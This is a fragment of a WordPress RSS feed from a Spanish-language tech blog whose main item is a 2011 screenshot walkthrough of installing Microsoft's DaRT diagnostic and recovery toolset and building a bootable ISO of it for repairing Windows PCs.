		<media:content url="http://1.gravatar.com/avatar/1e239b704116f53f06c340ef742d14a0?s=96&#38;d=wavatar&#38;r=G" medium="image">
			<media:title type="html">seifreed</media:title>
		</media:content>

		<media:content url="http://img717.imageshack.us/img717/1716/networkx.png" medium="image" />

		<media:content url="http://img546.imageshack.us/img546/9463/driveletters.png" medium="image" />

		<media:content url="http://img685.imageshack.us/img685/2038/teclado.png" medium="image" />

		<media:content url="http://img5.imageshack.us/img5/1406/recovery.png" medium="image" />

		<media:content url="http://img833.imageshack.us/img833/6535/recoveryoptions.png" medium="image" />

		<media:content url="http://img833.imageshack.us/img833/6535/recoveryoptions.png" medium="image" />

		<media:content url="http://img191.imageshack.us/img191/3217/registrocq.png" medium="image" />

		<media:content url="http://img849.imageshack.us/img849/6258/explorer.png" medium="image" />

		<media:content url="http://img545.imageshack.us/img545/6546/locksmith.png" medium="image" />

		<media:content url="http://img638.imageshack.us/img638/868/wizardsolution.png" medium="image" />

		<media:content url="http://img687.imageshack.us/img687/2950/crashyzer.png" medium="image" />

		<media:content url="http://img19.imageshack.us/img19/3553/networkconfiguration.png" medium="image" />

		<media:content url="http://img577.imageshack.us/img577/7922/filerestore.png" medium="image" />

		<media:content url="http://img233.imageshack.us/img233/1671/hotfixes.png" medium="image" />

		<media:content url="http://img34.imageshack.us/img34/3499/restorembr.png" medium="image" />

		<media:content url="http://img17.imageshack.us/img17/4885/sfce.png" medium="image" />

		<media:content url="http://img853.imageshack.us/img853/6711/diskwipe.png" medium="image" />

		<media:content url="http://img683.imageshack.us/img683/2716/filesearch.png" medium="image" />

		<media:content url="http://img834.imageshack.us/img834/2799/computermanagement.png" medium="image" />

		<media:content url="http://img198.imageshack.us/img198/5121/systemupdate.png" medium="image" />

		<media:content url="http://img233.imageshack.us/img233/4710/remoteconnections.png" medium="image" />
	</item>
		<item>
		<title>DaRT (Diagnostic And Recovery toolset) I</title>
		<link>http://seifreed.com/2011/04/13/dart-diagnostic-and-recovery-toolset-i/</link>
		<comments>http://seifreed.com/2011/04/13/dart-diagnostic-and-recovery-toolset-i/#comments</comments>
		<pubDate>Wed, 13 Apr 2011 06:05:04 +0000</pubDate>
		<dc:creator>Marc Rivero López</dc:creator>
				<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[Software]]></category>
		<category><![CDATA[DaRT]]></category>
		<category><![CDATA[Diagnostic And Recovery toolset]]></category>
		<category><![CDATA[Utilidades]]></category>
		<category><![CDATA[windows]]></category>

		<guid isPermaLink="false">http://seifreed.com/?p=3127</guid>
		<description><![CDATA[Hola! Muy buenas a todos/as! Si alguna vez nos ha tocado estar reparando PC&#8217;s, hemos tenido al final que armarnos con un kit para poder hacer casi de todo, de manera que no tengas problemas para solventar un problema que te encuentres. Seguro que a todos os suena Hirens Boot, con este CD lleno de [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=seifreed.com&#038;blog=1473574&#038;post=3127&#038;subd=seifreed&#038;ref=&#038;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Hola!</p>
<p>Muy buenas a todos/as!</p>
<p>Si alguna vez nos ha tocado estar reparando PC&#8217;s, hemos tenido al final que armarnos con un kit para poder hacer casi de todo, de manera que no tengas problemas para solventar un problema que te encuentres.</p>
<p>Seguro que a todos os suena <a href="http://www.hiren.info/pages/bootcd">Hirens Boot</a>, con este CD lleno de utlidades conseguimos solventar un amplio abanico de problemas.</p>
<p>Desde Microsoft ya está disponible DaRT, con esta utilidad nos facilitamos el area de protección y administración en el área de TI.</p>
<p>En este artículo veremos como crear la ISO de DaRT.</p>
<p>Para descargar DaRT podemos hacerlo desde <a href="http://go.microsoft.com/fwlink/?LinkID=214047">aquí.</a></p>
<p>Una vez descargado el ejecutable instalamos DaRT.</p>
<p><img class="aligncenter" src="http://img852.imageshack.us/img852/6629/creandoimagen.png" alt="" width="533" height="357" /></p>
<p>Como casi cualquier instalación en Windows, le damos a Next.</p>
<p><img class="aligncenter" src="http://img716.imageshack.us/img716/6053/imagenkc.png" alt="" width="534" height="366" /></p>
<p>DaRT necesita de archivos de neustro CD de Windows con el que instalamos el PC. Así que se los facilitamos meiante nuestro disco de instalación de Windows 7.</p>
<p><img class="aligncenter" src="http://img808.imageshack.us/img808/7690/copiado.png" alt="" width="533" height="357" /></p>
<p>Nos avisa de que ahora procederá a la extración de archivos y que puede tardar unos minutos.</p>
<p><img class="aligncenter" src="http://img5.imageshack.us/img5/5109/expandingbootimage.png" alt="" width="536" height="357" /></p>
<p>Podemos ver el proceso de extración de archivos y copiados del mismo.</p>
<p><img class="aligncenter" src="http://img508.imageshack.us/img508/6125/toolsenableodisable.png" alt="" width="537" height="358" /></p>
<p>Igual que si trabajaramos con <a href="http://technet.microsoft.com/en-us/library/cc782957%28WS.10%29.aspx">MMC</a>, podemos habilitar características de administración.</p>
<p><img class="aligncenter" src="http://img836.imageshack.us/img836/3669/remoteconections.png" alt="" width="533" height="359" /></p>
<p>Sobretodo en entorno corporativo, si queremos acceder de manera remota podemos habilitarlo =)</p>
<p><img class="aligncenter" src="http://img27.imageshack.us/img27/2361/dartdebugging.png" alt="" width="538" height="361" /></p>
<p>Si nos da un pantallazo azul y necesitamos hacer debugging, podemos usar las Debugging tools de Microsoft, si las tenemos instaladas en el PC, podemos imoportarlas a DaRT.</p>
<p><img class="aligncenter" src="http://img269.imageshack.us/img269/8993/definitions.png" alt="" width="531" height="361" /></p>
<p>Muchas veces el problema puede venir por el malware, que tengamos. Podemos aprovechar para actualizar las bases para poder hacer un scan mas tarde.</p>
<p><img class="aligncenter" src="http://img687.imageshack.us/img687/3527/driversx.png" alt="" width="534" height="360" /></p>
<p>Si tenemos algún hardware que no venga en el startup de Windows, podemos importar el .inf aquí.</p>
<p><img class="aligncenter" src="http://img807.imageshack.us/img807/355/additionalfiles.png" alt="" width="535" height="359" /></p>
<p>Aquí es dodne se creará la imagen de DaRT de manera temporal, si queremos añadir mas archivos podemos hacerlo.</p>
<p><img class="aligncenter" src="http://img856.imageshack.us/img856/9749/dartiso.png" alt="" width="532" height="362" /></p>
<p>Le ponemos el nombre a la ISO que vamos a crear.</p>
<p><img class="aligncenter" src="http://img857.imageshack.us/img857/7305/creandoiso.png" alt="" width="534" height="360" /></p>
<p>Vemos el proceso de creación de la ISO.</p>
<p><img class="aligncenter" src="http://img858.imageshack.us/img858/8269/grabarimagen.png" alt="" width="534" height="362" /></p>
<p>Si ya tenemos el DVD listo para grabar podemos hacer que se grabe ya directamente.</p>
<p><img class="aligncenter" src="http://img836.imageshack.us/img836/8276/recoveryc.png" alt="" width="535" height="354" /></p>
<p>Y finalmente ya tenemos  la ISO creada.</p>
<p>En el siguiente capítulo, podemos ver como trabajamos con DaRT</p>
<p>Un saludo</p>
<br />Filed under: <a href='http://seifreed.com/category/seguridad/'>Seguridad</a>, <a href='http://seifreed.com/category/software/'>Software</a> Tagged: <a href='http://seifreed.com/tag/dart/'>DaRT</a>, <a href='http://seifreed.com/tag/diagnostic-and-recovery-toolset/'>Diagnostic And Recovery toolset</a>, <a href='http://seifreed.com/tag/utilidades/'>Utilidades</a>, <a href='http://seifreed.com/tag/windows/'>windows</a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/seifreed.wordpress.com/3127/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/seifreed.wordpress.com/3127/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/seifreed.wordpress.com/3127/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/seifreed.wordpress.com/3127/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/seifreed.wordpress.com/3127/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/seifreed.wordpress.com/3127/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/seifreed.wordpress.com/3127/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/seifreed.wordpress.com/3127/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/seifreed.wordpress.com/3127/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/seifreed.wordpress.com/3127/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/seifreed.wordpress.com/3127/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/seifreed.wordpress.com/3127/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/seifreed.wordpress.com/3127/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/seifreed.wordpress.com/3127/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=seifreed.com&#038;blog=1473574&#038;post=3127&#038;subd=seifreed&#038;ref=&#038;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://seifreed.com/2011/04/13/dart-diagnostic-and-recovery-toolset-i/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		<georss:point>0.000000 0.000000</georss:point>
		<geo:lat>0.000000</geo:lat>
		<geo:long>0.000000</geo:long>
		<media:content url="http://1.gravatar.com/avatar/1e239b704116f53f06c340ef742d14a0?s=96&#38;d=wavatar&#38;r=G" medium="image">
			<media:title type="html">seifreed</media:title>
		</media:content>

		<media:content url="http://img852.imageshack.us/img852/6629/creandoimagen.png" medium="image" />

		<media:content url="http://img716.imageshack.us/img716/6053/imagenkc.png" medium="image" />

		<media:content url="http://img808.imageshack.us/img808/7690/copiado.png" medium="image" />

		<media:content url="http://img5.imageshack.us/img5/5109/expandingbootimage.png" medium="image" />

		<media:content url="http://img508.imageshack.us/img508/6125/toolsenableodisable.png" medium="image" />

		<media:content url="http://img836.imageshack.us/img836/3669/remoteconections.png" medium="image" />

		<media:content url="http://img27.imageshack.us/img27/2361/dartdebugging.png" medium="image" />

		<media:content url="http://img269.imageshack.us/img269/8993/definitions.png" medium="image" />

		<media:content url="http://img687.imageshack.us/img687/3527/driversx.png" medium="image" />

		<media:content url="http://img807.imageshack.us/img807/355/additionalfiles.png" medium="image" />

		<media:content url="http://img856.imageshack.us/img856/9749/dartiso.png" medium="image" />

		<media:content url="http://img857.imageshack.us/img857/7305/creandoiso.png" medium="image" />

		<media:content url="http://img858.imageshack.us/img858/8269/grabarimagen.png" medium="image" />

		<media:content url="http://img836.imageshack.us/img836/8276/recoveryc.png" medium="image" />
	</item>
	</channel>
</rss>
